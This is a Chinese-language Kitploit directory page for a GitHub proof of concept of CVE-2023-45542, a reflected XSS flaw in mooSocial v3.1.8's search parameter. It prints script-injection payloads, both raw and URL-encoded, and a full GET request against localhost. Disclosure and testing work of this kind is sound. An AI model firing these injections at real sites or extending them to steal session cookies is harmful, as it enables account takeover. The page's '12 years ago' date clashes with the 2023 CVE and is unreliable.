Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-45542 — mooSocial v3.1.8 在搜索功能上存在跨站脚本(XSS)漏洞。 | Kitploit
工具/GitHubGitHub/ahrixia/cve-2023-45542
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubahrixia/cve-2023-45542

CVE-2023-45542

mooSocial v3.1.8 在搜索功能上存在跨站脚本(XSS)漏洞。

查看仓库
12年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-45542

mooSocial v3.1.8 的搜索功能中的 q 参数存在一个反射型跨站脚本(XSS)漏洞,允许攻击者通过特制 URL 窃取用户的会话 Cookie 并冒充其账户。

漏洞参数:q

漏洞利用 - 概念验证 (POC)

反射型跨站脚本(XSS)

root@kitploit:~
Payload : test"><script>alert(1)</script>test 
FINAL Payload (URL encoded) : test%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest

对 [http://localhost/moosocial/search/index/q=] 发起 GET 请求:

root@kitploit:~
GET /moosocial/search/index/?q=test%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/moosocial/user_info/index/messages
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

截图

image

其他可用的 Payload

root@kitploit:~
Payload : test</title><script>alert(1)</script>test 
FINAL Payload (URL encoded) : test%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3etest
下载工具